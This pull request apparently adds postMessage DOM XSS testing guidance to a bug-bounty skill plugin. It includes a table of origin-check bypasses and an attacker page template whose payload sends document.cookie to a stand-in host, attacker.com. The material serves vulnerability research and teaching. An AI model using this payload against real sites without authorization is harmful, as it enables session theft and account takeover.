### PR TITLE
feat(vuln-classes): add postMessage testing to XSS section

### DIFF
--- a/skills/bug-bounty/SKILL.md
+++ b/skills/bug-bounty/SKILL.md
@@ -404,6 +404,8 @@ grep -rn "tx\.origin\|delegatecall\|selfdestruct\|block\.timestamp" --include="*
 # JavaScript/TypeScript -- prototype pollution, postMessage, RCE sinks
 grep -rn "__proto__\|constructor\[" --include="*.js" --include="*.ts" | grep -v node_modules
 grep -rn "postMessage\|addEventListener.*message" --include="*.js" | grep -v node_modules
+# ↑ If listeners found, verify origin-check robustness with attacker page —
+#   see web2-vuln-classes section 3 "postMessage Testing"
 grep -rn "child_process\|execSync\|spawn(" --include="*.js" | grep -v node_modules
 
 # Python -- pickle, yaml.load, eval, shell injection

--- a/skills/web2-recon/SKILL.md
+++ b/skills/web2-recon/SKILL.md
@@ -280,6 +280,7 @@ curl -sI https://target.com | grep -iE "server|x-powered-by|x-aspnet|x-runtime|x
 | Next.js | SSRF via Server Actions | Open redirect via redirect() |
 | GraphQL | Introspection → auth bypass on mutations | IDOR via node(id:) |
 | WordPress | Plugin SQLi | REST API auth bypass |
+| SPA frameworks (React / Vue / Svelte / Angular) | DOM XSS sinks via state/router → web2-vuln-classes section 3 "postMessage Testing" for cross-frame entry points | Client-side route auth bypass (role check only in JS) |
 
 ---
 

--- a/skills/web2-vuln-classes/SKILL.md
+++ b/skills/web2-vuln-classes/SKILL.md
@@ -123,6 +123,8 @@ element.src = userInput         // JavaScript URI possible
 location.href = userInput
 ```
 
+> **postMessage is a DOM XSS source** — same sinks above (innerHTML, eval, etc.) become reachable when fed by `addEventListener("message", ...)` without proper `event.origin` validation. See **postMessage Testing** below.
+
 ### XSS Bypass Techniques
 ```javascript
 // CSP bypass — unsafe-inline blocked
@@ -138,6 +140,73 @@ location.href = userInput
 - XSS + CSRF token theft = CSRF bypass on critical action
 - XSS + service worker = persistent XSS across pages
 - XSS + credential theft via fake login form = ATO
+
+### postMessage Testing
+DOM XSS variant where `window.addEventListener("message", ...)` lacks proper `event.origin` validation. Common on SDK callbacks, OAuth redirect handlers, iframe widgets, chat/analytics scripts — easy to miss because the entry point is **indirect** (no URL parameter, no form field, source-code grep alone doesn't reveal whether the origin check is sound).
+
+**Vulnerable pattern:**
+```js
+window.addEventListener("message", (e) => {
+  // No e.origin check → any page can postMessage in
+  document.getElementById("x").innerHTML = e.data
+})
+```
+
+**Common origin-check bypasses:**
+
+| Weak check | Bypass | Example that passes |
+|---|---|---|
+| `e.origin.indexOf("trusted")` | substring anywhere | `https://trusted.attacker.com` |
+| `e.origin.startsWith("https://trusted")` | suffix attack | `https://trusted.attacker.com` |
+| `e.origin.endsWith(".trusted.com")` | infix attack | `https://evil-trusted.com` (no dot prefix) |
+| `e.origin === "null"` | sandboxed iframe | `srcdoc`/`sandbox` iframe → origin literally `"null"` |
+| Regex with unescaped `.` | `.` matches any char | `/https?:\/\/trusted\.com/` matches `https://trusted-com.evil.com` |
+| No check at all | (just listen) | Any origin |
+
+**Finding listeners:**
+```js
+// DevTools console (Chromium) — list every message listener registered on window
+getEventListeners(window).message
+```
+```bash
+# Source grep when you have JS bundles
+grep -rn "addEventListener.*['\"]message['\"]" --include="*.js" | grep -v node_modules
+```
+- Burp extension: **postMessage-tracker** — auto-logs every postMessage with sender origin
+- The actual signal is whether the **sink fires**, not whether a listener exists — always confirm with the attacker page below
+
+**Attacker page template:**
+```html
+<!-- Hosted on attacker.com -->
+<iframe src="https://victim.com" id="v"></iframe>
+<script>
+  document.getElementById('v').onload = () => {
+    document.getElementById('v').contentWindow.postMessage(
+      '<img src=x onerror=fetch("//attacker.com/?c="+document.cookie)>',
+      '*'  // wildcard target — works regardless of origin policy on send
+    )
+  }
+</script>
+```
+
+**Chains That Pay:**
+```
+postMessage -> innerHTML/eval sink -> DOM XSS                          High
+postMessage -> OAuth code/state passing -> code theft -> ATO           Critical
+postMessage -> localStorage token override -> session manipulation     High
+postMessage -> JSON deserialize sink (eval/Function) -> RCE            Critical (rare)
+postMessage handler strict-equals origin (no bypass found)             N/A
+SDK postMessage with internal-only contract (no public callers)        Info (chain only)
+```
+
+**Triage:**
+```
+Listener missing origin check + reachable XSS sink (innerHTML/eval)   = High/Critical
+Listener missing origin check + OAuth code/state flows through it     = Critical (ATO)
+Listener present + origin check has substring/regex bypass            = same severity, PoC required
+Listener present + strict equality on origin (=== exact match)        = N/A
+Listener exists but only logs / no DOM mutation                       = Low/Info
+```
 
 ---
 


### PR DESCRIPTION
## What this adds

A new subsection (**postMessage Testing**) under section 3 (XSS) in `web2-vuln-classes/SKILL.md` covering a DOM XSS variant the plugin currently mentions only in source-code grep notes — not as a dynamic-test pattern.

postMessage exploitation is common on SDK callbacks, OAuth redirect handlers, iframe widgets, chat/analytics scripts. The hard part isn't finding `addEventListener("message", ...)` — it's verifying whether the `event.origin` check is sound. Source grep alone can't answer that.

### Section contents
- **Vulnerable pattern** — minimal example of a listener missing `event.origin` validation feeding `innerHTML`
- **6 common origin-check bypasses** with concrete example values that pass each one:
  - `indexOf("trusted")` → substring anywhere
  - `startsWith("https://trusted")` → suffix attack
  - `endsWith(".trusted.com")` → infix attack
  - `=== "null"` → sandboxed iframe (`srcdoc`/`sandbox` attribute)
  - Regex with unescaped `.` → `.` matches any char
  - No check at all
- **Listener discovery** — DevTools `getEventListeners(window).message`, source grep recipe, Burp `postMessage-tracker` extension reference
- **Attacker page template** (HTML + JS) — drop-in iframe + postMessage payload for end-to-end verification
- **6-row Chains That Pay table** in the same shape as `security-arsenal/SKILL.md` conditionally-valid table (DOM XSS, OAuth code theft → ATO, localStorage override, JSON deserialize → RCE)
- **5-row triage table** consistent with the existing always-rejected list

### Workflow hooks
Cross-references added at three natural decision points so the new content actually fires:

| File | Where | What |
|---|---|---|
| `web2-vuln-classes` Section 3 | DOM XSS Sinks block | Adds note: postMessage is a *source* feeding these sinks; see postMessage Testing below |
| `bug-bounty` JS source-audit section | After existing `grep postMessage` line | Adds pointer: if listeners found, verify origin-check robustness with attacker page |
| `web2-recon` stack→bug class table | New row for SPA frameworks (React/Vue/Svelte/Angular) | Points to postMessage Testing for cross-frame entry points |

### Why this matters
Two real bug-bounty paths the plugin currently underplays:
1. **OAuth code theft** — many OAuth providers use postMessage to return the `code` parameter to the parent window. A missing or weak origin check on the receiver = direct ATO (Critical)
2. **DOM XSS via cross-frame source** — even when there's no URL-parameter XSS, a poorly validated postMessage listener feeding `innerHTML`/`eval` gives an attacker the same primitive

### Non-changes
- No new commands
- No new skills
- No new tool scripts
- No external dependencies

### File-level changes
- `skills/web2-vuln-classes/SKILL.md` — +69 lines (new subsection + DOM XSS Sinks pointer)
- `skills/bug-bounty/SKILL.md` — +2 lines (cross-reference at grep step)
- `skills/web2-recon/SKILL.md` — +1 line (SPA frameworks row in stack-class table)